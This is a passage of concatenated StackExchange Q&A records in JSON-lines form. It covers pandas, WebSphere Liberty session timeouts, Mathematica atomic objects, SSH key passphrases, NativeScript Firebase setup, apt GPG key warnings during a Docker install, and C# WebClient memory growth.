Thank you!\nAnswer: You may use <code>DataFrame.loc<\/code>, that'll change column <code>Notes<\/code> only where needed, based on the condition on the <code>ID<\/code> column\n<code>df.loc[df['ID'].str.startswith('CA'), 'Notes'] = df['Notes'] + '; CA'\n<\/code>\nAnswer: We can do <code>str.extract<\/code>\n<code>df['Notes'] = (';'+df.ID.str.extract('(CA)')[0]).fillna('').radd(df.Notes)\ndf\nOut[292]: \n ID Notes\n0 US123 1111\n1 CA456 2222;CA\n2 US123 3333\n3 US123 4444\n4 CA456 5555;CA\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to replace a string in a column based on the value of another column?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Websphere Liberty session timeout\n\nQuestion: I am using websphere liberty. I need to set the session expiry for my web application to value t. What value should be set for LTPA expiry? Since LTPA expiry time start from login, where the session expiry time is counted from last activity\nAnswer: LTPA timeout is fixed, so if you want LTPA expiration to happen less often you can set it to typical working hours of your users e.g. 8h.\nYou can set it in the <code><ltpa><\/code> entry in <code>server.xml<\/code>.\n<code><ltpa keysFileName=\"yourLTPAKeysFileName.keys\" keysPassword=\"keysPassword\" expiration=\"480\" \/>\n<\/code>\nIf you just want to logout user when the session expires use the following config element: \n<code><webAppSecurity logoutOnHttpSessionExpire=\"true\"\/>\n<\/code>\nMore details can be found here: Customizing SSO configuration using LTPA cookies in Liberty\nComment: Setting LTPA timeout to 8h irrespective of session timeout - even if session expires, a new session will be created and the user will never log out until 8 hours.\nComment: @HiteshBajaj - What is your actual problem? LTPA is fixed, session timeout is inactivity , so you can have session lasting for all day if user will be constantly clicking. If you want to logout user when the session expires use the `logoutOnHttpSessionExpire=true` setting.\nComment: consider a scenario, where LTPA timeout is 6 hours and inactivity timeout is 2 hours.\nNow the user signs in, LTPA is generated. The user continues to use the website for 6 hours. The session is not inactive at this stage, but the LTPA token expires and the user is redirected for fresh authentication. (The session is not destroyed, but fresh authentication is required). How to deal with this.\nComment: @HiteshBajaj - I've already written that - if you want to avoid expiration of LTPA set it to very long value (12h), so it doesnt expire for the whole user working day. It is not possible to by pass user reauthentication when LTPA expires, unless you are using BASIC auth (which unfortunately prevents logout) or some sso mech like SPNEGO (which performs reauth behind the scene).\nComment: thanks for your reply. I intend to logout session honoring the session inactivity time specified. I want to somehow bypass LTPA expiry(by refreshing the token before it expires). is there a way?\nComment: @HiteshBajaj , no there is no way to refresh LTPA token, other than I've already pointed.\n","meta":{"source":"stackoverflow","title":"Websphere Liberty session timeout","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bags and non-standard evaluation\n\nQuestion: What can internally be happening here? Is the evaluator just messing with us and going non-standard because it's a <code>Bag<\/code>? 
Or am I just not seeing how something like this could be done in Mathematica?\n<code>AppendTo[$ContextPath, \"Internal`\"];\n\nIn[19]:= ClearAll[x, y];\n{x, y} = {Bag[{1, 2, 3}], Bag[{4, 5}]};\n<\/code>\nHeads are\n<code>In[21]:= Head \/@ {x, y}\n\nOut[21]= {Bag, Bag}\n<\/code>\nBut they are just a head, no depth. Depths \n<code>In[22]:= Depth \/@ {x, y}\n\nOut[22]= {1, 1}\n<\/code>\nHowever, they are different. I take their second elements, or I print them in <code>InputForm<\/code>\n<code>In[23]:= BagPart[#, 2] & \/@ {x, y}\nInputForm \/@ {x, y}\n\nOut[23]= {2, 5}\n\nOut[24]= {InputForm[Internal`Bag[{1, 2, 3}]], InputForm[Internal`Bag[{4, 5}]]}\n<\/code>\nAnswer: This is not related to evaluation. <code>Internal`Bag<\/code>, like many other special types, is an atomic object. You can verify this using <code>AtomQ[x]<\/code>. This is despite its <code>InputForm<\/code> suggesting a structure. \nThis is no different from how <code>Graph<\/code>, <code>Rational<\/code>, <code>Complex<\/code> or <code>SparseArray<\/code> behave. (Though for <code>SparseArray<\/code>, most list manipulation functions are implemented, so it's much more difficult to notice that it is atomic).\n\nA similar example using <code>Rational<\/code>:\n<code>In[206]:= rats={1\/2,2\/3}\nOut[206]= {1\/2,2\/3}\n\nIn[208]:= Head\/@rats\nOut[208]= {Rational,Rational}\n\nIn[209]:= Depth\/@rats\nOut[209]= {1,1}\n\nIn[210]:= FullForm[rats]\nOut[210]\/\/FullForm= List[Rational[1,2],Rational[2,3]]\n<\/code>\nComment: I am starting to hate to vote for your answers because I will never catch up, but their quality compels me. +1 *yet again*\nComment: Actually, I gave the wrong link. This is the one I meant: http:\/\/stackoverflow.com\/questions\/4301833\/new-graph-in-mathematica-8-0\/4356488#4356488, and also I share the point of @WReach which he expressed here: http:\/\/stackoverflow.com\/questions\/7363253\/object-oriented-mathematica-programming\/7379002#7379002\nComment: I would make a distinction between `Graphs` and other objects. For most atomic objects in the past, it was possible to deconstruct and reconstruct them by using their `InputForm` (`FullForm`), the feature which I consider essential. This plays well with immutability. For `Graph`-s, a decision was made to introduce mutable state (properties), and their `InputForm` is deceiving. I dislike this feature, and also think that one should distinguish these two situations. You are certainly well-aware of this discussion: http:\/\/stackoverflow.com\/questions\/5964469\/which-objects-are-atomic-in-mathematica\nAnswer: I think <code>Internal`Bag<\/code> is a monolithic object which is only constructed using the <code>Bag[list]<\/code> syntax. 
Note that the same is true for <code>Graph<\/code>:\n<code>Graph[{1<->2,2<->3}]\/\/Head\n(*\n==> Graph\n*)\nGraph[{1<->2,2<->3}]\/\/Depth\n(*\n==> 1\n*)\n<\/code>\nAlso note the output of the objects when typing directly in the kernel:\n<code>Internal`Bag[{2,3}]\n(*\n==> Internal`Bag[<2>]\n*)\nGraph[{1<->2,2<->3}]\n(*\n==> Graph[<3>, <2>]\n*)\n<\/code>\nEven <code>FullForm<\/code> doesn't give more information, which shows that on the Mathematica expression level that's all there is.\nComment: It is not that surprising that `FullForm` is broken with `Bag` since `Bag` is not really meant for user consumption..\nComment: @Szabolcs: But `Graph` is definitely meant for user consumption, and it shows exactly the same behaviour.\nComment: Regarding `Graphs`, see my comment below @Szabolcs's answer.\nComment: Of course, I just meant that the edges are not as polished as for the other types, e.g. `FullForm` on `Graph` does work even though it's atomic (but pattern matching doesn't --- while it works for older types like `Rational`)\nComment: Maybe it's a version thing; as I've shown in my post, `Graph` for me shows the exact same behaviour for `FullForm` as `Bag` (parameters showing up as ``).\n","meta":{"source":"mathematica.stackexchange","title":"Bags and non-standard evaluation","dup_signals":{}},"subset":"stackexchange"} +{"text":"What purpose does an SSH private key passphrase serve?\n\nQuestion: Let's say you generate an SSH RSA key pair with <code>ssh-keygen -t rsa -b 2048<\/code>. You'll end up with a public and private key.\n\n<code>id_rsa<\/code>\n<code>id_rsa.pub<\/code>\n\n<code>ssh-keygen<\/code> will prompt: <code>Enter passphrase (empty for no passphrase):<\/code>\nMy understanding is that <code>id_rsa<\/code> will get one prime and <code>id_rsa.pub<\/code> will get another prime. What purpose does the passphrase serve? Is the private key locally encrypted with the passphrase?\nI notice that the <code>id_rsa<\/code> file length is a lot longer than that of <code>id_rsa.pub<\/code>. Is this a byproduct of encryption? Is there more encoded data?\nComment: \"My understanding is that id_rsa will get one prime and id_rsa.pub will get another prime.\" That is incorrect. `id_rsa.pub` is the public key and `id_rsa` is the private key. The public key contains the encryption exponent and the modulus. Either of the primes can be used to compute the private key from the public key so they must both be kept secret.\nComment: This answer explains what's in the private key: https:\/\/crypto.stackexchange.com\/a\/31810\/92165.\nAnswer: It's an encryption passphrase, and serves as an additional protection against an attacker who compromises your PC's data, buying you some time after the compromise to revoke all your key authorizations.\nIf, for instance, your laptop gets stolen, and it is running, it is logged-in, or it lacks local encryption, your attacker would, in the absence of a key password, immediately be able to pivot into all SSH servers your laptop is in the <code>authorized_keys<\/code> of. (The <code>HashKnownHosts<\/code> directive was introduced in March 2005 to make this pivoting process less trivial, but one's shell history, Git repositories, etc. can still be mined for destinations.)\nIt does not serve as any extra \"authentication\", since I believe\u2014other than timing\u2014there's no way for the server to even know that your SSH client happens to use an encrypted keystore. 
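To make the "encrypted at rest" point concrete: with a passphrase set, <code>id_rsa</code> on disk is just ciphertext until the passphrase is supplied. Below is a small sketch using the third-party Python <code>cryptography</code> package; the path and passphrase are placeholders, and the exception handling is deliberately loose because the exact error raised for a missing passphrase depends on the library version.
<code>
# Sketch: a passphrase-protected OpenSSH private key can only be parsed once
# the passphrase is supplied; without it the file is opaque ciphertext.
# The path and passphrase below are placeholders; requires a recent version of
# the third-party "cryptography" package (which provides load_ssh_private_key).
from pathlib import Path
from cryptography.hazmat.primitives.serialization import load_ssh_private_key

blob = (Path.home() / ".ssh" / "id_rsa").read_bytes()

try:
    key = load_ssh_private_key(blob, password=None)
    print("key was stored without a passphrase")
except (TypeError, ValueError):
    # the exact exception for a missing passphrase varies by library version
    key = load_ssh_private_key(blob, password=b"correct horse battery staple")
    print("decrypted a", type(key).__name__)
</code>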
(Unless, of course, your IT administrator is being creative with RMF and is claiming to have implemented \"two factor authentication\" by mandating SSH keys be encrypted at rest...)\nComment: As an informal aside, it looks like [at least as of OpenSSH 7.7](https:\/\/www.latacora.com\/blog\/2018\/08\/03\/the-default-openssh\/), the \"protection\" provided actually kinda sucks. And it sucked a *lot worse* if you generated your key with OpenSSH 6.4 or older, or generated an RSA key without using the `-o` flag. \nAnswer: \nWhat purpose does the passphrase serve? Is the private key locally encrypted with the passphrase?\n\nThe passphrase is derived in a symmetrical key used to encrypt the private key. It can act as a client-side (not the best) second authentication factor (the first one being the possession of the private key file), and to protect the confidentiality of the secret key if it somehow leaks, for example from an unencrypted backup.\n\nI notice that the id_rsa file length is a lot longer than that of id_rsa.pub. Is this a byproduct of encryption? Is there more encoded data?\n\nThe public key is also appended to the private key in the <code>id_rsa<\/code> file. You can recover the public key file with just the private one.\nAnswer: \nMy understanding is that id_rsa will get one prime and id_rsa.pub will get another prime.\n\nNot quite. The public key has a modulus $r$ and an exponent $e$. The private key has the same modulus $r$ and an exponent $d$. They are chosen so that for any $a\\leq r$, $$(a^e)^d\\equiv a (\\mod r)$$\nIt is possible to deduce $d$ from $e$ (and vice versa) if one knows the prime factors of $r$. We hypothesize that this is the only way of doing it. Since in general it is easy to factorise something that has lots of small prime factors we like to make the prime factors of $r$ as large as possible. Frequently this is described as making $r$ a product of two primes but this is by no means necessary. For example, in implementations where large-number modular arithmetic is much more efficient when the modulus is (say) just under a power of $2$, an implementor could choose to have a third, small prime to get $r$ into that form.\n\nLength of keys\n\nWhen creating the keys you can choose one of the exponents to be more or less anything you like, and then deduce the other one from it. In particular, you can choose one of them to be very small indeed, since the time taken for exponentiation is affected by the size of the exponent and the number of $1$ bits in it. $3$ and $65537$ are popular choices. Obviously such a short exponent would be easy to guess, so for this reason it is the public key that can benefit from this abbreviation - which, remember, is not mathematically necessary but merely a convenience for the sake of implementation.\nSo if this is done, the public key (with a very short exponent) will be practically half the length of the private one.\n\nThe passphrase\n\nThe paraphrase is of no great cryptographic interest. 
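(As a quick numeric check of the relation above, and of the remark that r need not be a product of exactly two primes: the toy values below use a three-prime modulus. This assumes Python 3.8+ for the modular inverse via <code>pow</code>, and the numbers are far too small for real use.)
<code>
# Toy-sized check of (a**e)**d == a (mod r) with a modulus built from three
# primes (3 * 11 * 17), echoing the point that "a product of two primes" is
# conventional rather than mathematically required. Illustrative values only.
p1, p2, p3 = 3, 11, 17
r = p1 * p2 * p3                       # 561
phi = (p1 - 1) * (p2 - 1) * (p3 - 1)   # 320
e = 3                                  # small public exponent
d = pow(e, -1, phi)                    # 107, the matching private exponent

assert all(pow(pow(a, e, r), d, r) == a for a in range(r))
print(f"r={r}, e={e}, d={d}: every residue round-trips")
</code>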
Its sole function is to say \"Even if you accidentally let someone have a copy of the private key file, he won't actually have the private key without guessing the pass phrase\".\nComment: Only the last sentence answers (half of) the question.\nComment: While it is true d is large and e small, both privatekey formats _used by OpenSSH_ for RSA include all the 'CRT' parameters (p, q, dp, dq, qinv) as shown in the answer now linked on the Q (and wikipedia) which makes it **over 4 times** the size of the publickey.\n","meta":{"source":"crypto.stackexchange","title":"What purpose does an SSH private key passphrase serve?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to initiazlize firebase puse notifications in NativeScript Angular app\n\nQuestion: I am creating an app with nativescript + Angular + Firebase push notifications using this plugin: nativescript-plugin-firebase.\nAccording to their documentation firebase.init should be called OnInit but then after app is reloaded in development i got an error that \"Token is already intialized\"\nQuestion is how to check if token is already intialized.\nI can check by using this code but it is kind of hacky:\n<code>const initializedToken = await messaging.getCurrentPushToken();\n\nif (initializedToken) {\n return;\n}\n<\/code>\nAlso i wonder if developemnt app restart = app reopen on real device?\nThanks\nAnswer: I haven't used Nativescript but with my Angular knowledge, I can tell you that Place your <code>firebase.init()<\/code> method in the <code>app.component.ts<\/code> file because it is the first component and is always eagerly loaded once the app starts. and then you can use firebase's methods to verify of its initialized or not.\nComment: Thats exactly where i am adding this. But on each change app gets reloaded and i get error saying that firebase was already initialized.\nComment: what kind of change\nComment: on any file save change when app is rebuilt\n","meta":{"source":"stackoverflow","title":"How to initiazlize firebase puse notifications in NativeScript Angular app","dup_signals":{}},"subset":"stackexchange"} +{"text":"I am trying to install docker. Whenever i run sudo apt-get update, i get this error:\n\nQuestion: <code>Hit:1 http:\/\/packages.microsoft.com\/repos\/vscode stable InRelease \nGet:2 http:\/\/repository.spotify.com stable InRelease [3,316 B] \nHit:3 https:\/\/download.docker.com\/linux\/debian stretch InRelease\nIgn:2 http:\/\/repository.spotify.com stable InRelease\nHit:4 https:\/\/deb.opera.com\/opera-stable stable InRelease\nHit:5 https:\/\/packagecloud.io\/AtomEditor\/atom\/any any InRelease\nFetched 3,316 B in 4s (774 B\/s)\n\nReading package lists... 
Done\n\nW: GPG error: http:\/\/repository.spotify.com stable InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 4773BD5E130D1D45\nW: The repository 'http:\/\/repository.spotify.com stable InRelease' is not signed.\nN: Data from such a repository can't be authenticated and is therefore potentially dangerous to use.\nN: See apt-secure(8) manpage for repository creation and user configuration details.\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\n<\/code>\nComment: This has nothing to do with programming or docker. Please try something like https:\/\/askubuntu.com , [unix.se] or [su].\nAnswer: As far as I can see, the error is unrelated to Docker! Nevertheless, to still help you around this issue: You need to add the Spotify repository GPG key to yor apt keys. You may do so by issuing the following command in a shell:\n<code>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 4773BD5E130D1D45\n<\/code>\nYou can find this information in the Debian Wiki. Please note that on the Spotify forums, someone reported that he needed to add another key to make it work:\n<code>sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys A87FF9DF48BF1C90\n<\/code>\nI did not test any of them personally (using Arch linux), but I used Ubuntu some years ago, and am familiar with this kind of issue.\nPS: If you try which one actually worked for you, let me know so that I can update the answer. Thanks!\nComment: The second GPG key worked correctly.\nComment: still getting these warnings:\n\nW: Target Packages (stable\/binary-amd64\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\n\nW: Target Packages (stable\/binary-all\/Packages) is configured multiple times in \/etc\/apt\/sources.list.d\/docker-ce.list:1 and \/etc\/apt\/sources.list.d\/docker.list:1\nComment: yes, this is yet another issue. it seems you configured the docker packages twice, once in \/etc\/apt\/sources.list.d\/docker-ce.list as well as \/etc\/apt\/sources.list.d\/docker.list. remove one of them, leave whichever you prefer.\nComment: Thank you so much. My issue is solved now.\n","meta":{"source":"stackoverflow","title":"I am trying to install docker. Whenever i run sudo apt-get update, i get this error:","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# WebClient - Large increase of LOH after downloading files\n\nQuestion: I have a class responsible for downloading files in a download manager. This class is responsible for downloading the file and writing it to the given path.\nThe size of the files to download varies normally from 1 to 5 MB but could also be much larger. 
I'm using an instance of the WebClient class to get the file from the internet.\n<code>public class DownloadItem\n{\n #region Events\n public delegate void DownloadItemDownloadCompletedEventHandler(object sender, DownloadCompletedEventArgs args);\n\n public event DownloadItemDownloadCompletedEventHandler DownloadItemDownloadCompleted;\n\n protected virtual void OnDownloadItemDownloadCompleted(DownloadCompletedEventArgs e)\n {\n DownloadItemDownloadCompleted?.Invoke(this, e);\n }\n\n public delegate void DownloadItemDownloadProgressChangedEventHandler(object sender, DownloadProgressChangedEventArgs args);\n\n public event DownloadItemDownloadProgressChangedEventHandler DownloadItemDownloadProgressChanged;\n\n protected virtual void OnDownloadItemDownloadProgressChanged(DownloadProgressChangedEventArgs e)\n {\n DownloadItemDownloadProgressChanged?.Invoke(this, e);\n }\n #endregion\n\n #region Fields\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n private WebClient _client;\n #endregion\n\n #region Properties\n public PlaylistItem Item { get; }\n public string SavePath { get; }\n public bool Overwrite { get; }\n #endregion\n\n public DownloadItem(PlaylistItem item, string savePath, bool overwrite = false)\n {\n Item = item;\n SavePath = savePath;\n Overwrite = overwrite;\n }\n\n public void StartDownload()\n {\n if (File.Exists(SavePath) && !Overwrite)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true));\n return;\n }\n\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(1));\n Item.RetreiveDownloadUrl();\n\n if (string.IsNullOrEmpty(Item.DownloadUrl))\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, new InvalidOperationException(\"Could not retreive download url\")));\n return;\n }\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n using (_client = new WebClient())\n {\n _client.Headers.Add(\"user-agent\", \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)\");\n\n try\n {\n _client.DownloadDataCompleted +=\n (sender, args) =>\n {\n Task.Run(() =>\n {\n DownloadCompleted(args);\n });\n };\n _client.DownloadProgressChanged += (sender, args) => OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(args.ProgressPercentage));\n _client.DownloadDataAsync(new Uri(Item.DownloadUrl));\n }\n catch (Exception ex)\n {\n Logger.Warn(ex, \"Error downloading track {0}\", Item.VideoId);\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n }\n\n private void DownloadCompleted(DownloadDataCompletedEventArgs args)\n {\n \/\/ _client = null;\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n \/\/ GC.Collect(2, GCCollectionMode.Forced);\n\n if (args.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, args.Error));\n return;\n }\n\n try\n {\n File.WriteAllBytes(SavePath, args.Result);\n\n using (var file = TagLib.File.Create(SavePath))\n {\n file.Save();\n }\n\n try\n {\n MusicFormatConverter.M4AToMp3(SavePath);\n }\n catch (Exception)\n {\n \/\/ ignored\n }\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n Logger.Error(ex, \"Error writing track file for track {0}\", Item.VideoId);\n }\n }\n\n public void StopDownload()\n {\n _client?.CancelAsync();\n }\n\n public 
override int GetHashCode()\n {\n return Item.GetHashCode();\n }\n\n public override bool Equals(object obj)\n {\n var item = obj as DownloadItem;\n\n return Item.Equals(item?.Item);\n }\n}\n<\/code>\nEvery download causes a very large memory increase compared with the file size of the downloaded item. If I download a file with a size of ~3 MB the memory usage is increasing about 8 MB.\n\nAs you can see the download is producing much LOH which is not cleared after the download. Even forcing the GC or the setting <code>GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;<\/code> is not helping to prevent this memory leak.\n\nComparing Snapshot 1 and 2 you can see that the amount of memory is produced by byte arrays which might be the download result.\n\nDoing several downloads shows how terrible this memory leak is.\nIn my opinion this is caused by the WebClient instance in any way. However I can't really determine what exactly is causing this issue.\nIt doesn't even matters if I force the GC. This screen here shows it without forced gc:\n\nWhat is causing this overheat and how can I fix it? This is a major bug and imagining 100 or more downloads the process would run out of memory. \nEdit\n\nAs suggested I commented out the section responsible for setting the tags and converting the M4A to an MP3. However the converter is just a call of FFMPEG so it shouldn't be a memory leak:\n<code>class MusicFormatConverter\n{\n public static void M4AToMp3(string filePath, bool deleteOriginal = true)\n {\n if(string.IsNullOrEmpty(filePath) || !filePath.EndsWith(\".m4a\"))\n throw new ArgumentException(nameof(filePath));\n\n var toolPath = Path.Combine(\"tools\", \"ffmpeg.exe\");\n\n var convertedFilePath = filePath.Replace(\".m4a\", \".mp3\");\n File.Delete(convertedFilePath);\n\n var process = new Process\n {\n StartInfo =\n {\n FileName = toolPath,\n#if !DEBUG\n WindowStyle = ProcessWindowStyle.Hidden,\n#endif\n Arguments = $\"-i \\\"{filePath}\\\" -acodec libmp3lame -ab 128k \\\"{convertedFilePath}\\\"\"\n }\n };\n\n process.Start();\n process.WaitForExit();\n\n if(!File.Exists(convertedFilePath))\n throw new InvalidOperationException(\"File was not converted successfully!\");\n\n if(deleteOriginal)\n File.Delete(filePath);\n }\n}\n<\/code>\nThe <code>DownloadCompleted()<\/code> method looks now like this:\n<code>private void DownloadCompleted(DownloadDataCompletedEventArgs args)\n{\n \/\/ _client = null;\n\n \/\/ GCSettings.LargeObjectHeapCompactionMode = GCLargeObjectHeapCompactionMode.CompactOnce;\n \/\/ GC.Collect(2, GCCollectionMode.Forced);\n\n if (args.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, args.Error));\n return;\n }\n\n try\n {\n File.WriteAllBytes(SavePath, args.Result);\n\n \/*\n using (var file = TagLib.File.Create(SavePath))\n {\n file.Save();\n }\n\n try\n {\n MusicFormatConverter.M4AToMp3(SavePath);\n }\n catch (Exception)\n {\n \/\/ ignore\n }\n *\/\n\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(false));\n }\n catch (Exception ex)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n Logger.Error(ex, \"Error writing track file for track {0}\", Item.VideoId);\n }\n}\n<\/code>\nThe result after downloading 7 items:\n\nIt seems like this was not the memory leak.\nAs an addition I'm submitting the <code>DownloadManager<\/code> class too as it is handling the whole download operation. 
Maybe this could be the source of the problem.\n<code>public class DownloadManager\n{\n #region Fields\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n private readonly Queue<DownloadItem> _queue;\n private readonly List<DownloadItem> _activeDownloads;\n private bool _active;\n private Thread _thread;\n #endregion\n\n #region Construction\n public DownloadManager()\n {\n _queue = new Queue<DownloadItem>();\n _activeDownloads = new List<DownloadItem>();\n }\n #endregion\n\n #region Methods\n public void AddToQueue(DownloadItem item)\n {\n _queue.Enqueue(item);\n\n StartManager();\n }\n\n public void Abort()\n {\n _thread?.Abort();\n\n _queue.Clear();\n _activeDownloads.Clear();\n }\n\n private void StartManager()\n {\n if(_active) return;\n\n _active = true;\n\n _thread = new Thread(() =>\n {\n try\n {\n while (_queue.Count > 0 && _queue.Peek() != null)\n {\n DownloadItem();\n\n while (_activeDownloads.Count >= Properties.Settings.Default.ParallelDownloads)\n {\n Thread.Sleep(10);\n }\n }\n\n _active = false;\n }\n catch (ThreadInterruptedException)\n {\n \/\/ ignored\n }\n });\n _thread.Start();\n }\n\n private void DownloadItem()\n {\n if (_activeDownloads.Count >= Properties.Settings.Default.ParallelDownloads) return;\n\n DownloadItem item;\n try\n {\n item = _queue.Dequeue();\n }\n catch\n {\n return;\n }\n\n if (item != null)\n {\n item.DownloadItemDownloadCompleted += (sender, args) =>\n {\n if(args.Error != null)\n Logger.Error(args.Error, \"Error downloading track {0}\", ((DownloadItem)sender).Item.VideoId);\n\n _activeDownloads.Remove((DownloadItem) sender);\n };\n\n _activeDownloads.Add(item);\n Task.Run(() => item.StartDownload());\n }\n }\n #endregion\n<\/code>\nComment: What is your .NET version? From your code, it says: NET CLR 1.0.3705\nComment: I'm using .NET Framework 4.5.2\nComment: WebClient does not have a leak. Clearly you ought to be much more concerned about \"Taglib\" and \"MusicFormatConverter\", classes that so unlike WebClient are *not* tested millions of times every day. Use a decent memory profiler to get ahead.\nComment: I edited my post and tried it without the Taglib and MusicFormatConverter part. The result is still the same.\nComment: I fear that the WebClient is not disposed properly. That would explain the high overheat. Maybe there is an explanation for this but I have no clue atm.\nComment: I believe it's by design. WebClient behaves like this when using the DownloadData and DownloadString methods. Behind the scene it uses a buffer backed by byte arrays that can double its size each time it thinks its needed: https:\/\/referencesource.microsoft.com\/#System\/net\/System\/Net\/_ScatterGatherBuffers.cs,2e60233bb771e7a1,references . There are two solutions: you can use DownloadFile instead wich uses a Stream internally, which is the easiest way, and in the end, that's what you do, or use the OpenRead methods and stream things by yourself and avoid huge byte[] allocations.\nComment: @SimonMourier Yesterday I tried the DownloadFileAsync method but it end up in the same situation like the DownloadDataAsync method. It still produces a large overheat compared to the downloaded size. I think I am forced to use the second method you described.\nComment: @chris579: We can't see your images in the question.\nComment: @CharithJ Strange, I can see them. However this issue was already fixed.\nComment: @HansPassant WebClient has a leak when used asynchronously. 
See this question: https:\/\/stackoverflow.com\/questions\/53350298\/large-unexplained-memory-in-the-memory-dump-of-a-net-process 2OP: thanks for your question and workaround!!!\nAnswer: Finally, after dozens of profilings and memory checking the issue is resolved now.\nAs @SimonMourier already stated this issue is related to the design of the <code>UploadFile<\/code>, <code>DownloadData<\/code>, <code>DownloadString<\/code> and <code>DownloadFile<\/code> methods. Looking into the backend of them you can see that all of them are using the private <code>DownloadBits<\/code> method in the <code>WebClient<\/code> class with this signature:\n<code>private byte[] DownloadBits(WebRequest request, Stream writeStream, CompletionDelegate completionDelegate, AsyncOperation asyncOp)\n<\/code>\nRegarding the return type it is clear why the behaviour is like I discovered:\nWhen using the above mentioned methods the content is saved in a byte array. Therefore it is not recommended to use these methods if the file size is > 85,000 bytes as this would result in filling the LOH until the memory limit is reached. This might not be important if the files are small but with growing size the LOH is also growing by a multiple.\nAs an addition here my final solution:\n<code>public class DownloadItem : DownloadManagerItem\n{\n #region Fields\n\n private static readonly Logger Logger = LogManager.GetCurrentClassLogger();\n\n private WebClient _webClient;\n\n #endregion\n\n #region Properties\n\n public string SavePath { get; }\n public bool Overwrite { get; }\n public DownloadFormat DownloadFormat { get; }\n\n #endregion\n\n public DownloadItem(PlaylistItem item, string savePath, DownloadFormat downloadFormat, bool overwrite = false)\n : base(item)\n {\n SavePath = savePath;\n Overwrite = overwrite;\n DownloadFormat = downloadFormat;\n }\n\n public override void StartDownload()\n {\n if (File.Exists(SavePath) && !Overwrite)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true));\n return;\n }\n\n OnDownloadItemDownloadProgressChanged(new DownloadProgressChangedEventArgs(1));\n Item.RetreiveDownloadUrl();\n\n if (string.IsNullOrEmpty(Item.DownloadUrl))\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true,\n new InvalidOperationException(\"Could not retreive download url\")));\n return;\n }\n\n using (_webClient = new WebClient())\n {\n _webClient.Headers.Add(\"user-agent\",\n \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)\");\n\n try\n {\n _webClient.OpenReadCompleted += WebClientOnOpenReadCompleted;\n\n _webClient.OpenReadAsync(new Uri(Item.DownloadUrl));\n }\n catch (Exception ex)\n {\n Logger.Warn(ex, \"Error downloading track {0}\", Item.VideoId);\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, ex));\n }\n }\n }\n\n private void WebClientOnOpenReadCompleted(object sender, OpenReadCompletedEventArgs openReadCompletedEventArgs)\n {\n _webClient.Dispose();\n\n if (openReadCompletedEventArgs.Cancelled)\n {\n OnDownloadItemDownloadCompleted(new DownloadCompletedEventArgs(true, openReadCompletedEventArgs.Error));\n return;\n }\n\n if (!Overwrite && File.Exists(SavePath))\n return;\n\n var totalLength = 0;\n try\n {\n totalLength = int.Parse(((WebClient)sender).ResponseHeaders[\"Content-Length\"]);\n }\n catch (Exception)\n {\n \/\/ ignored\n }\n\n try\n {\n long processed = 0;\n var tmpPath = Path.GetTempFileName();\n\n using (var stream = openReadCompletedEventArgs.Result)\n using (var fs = File.Create(tmpPath))\n {\n var 
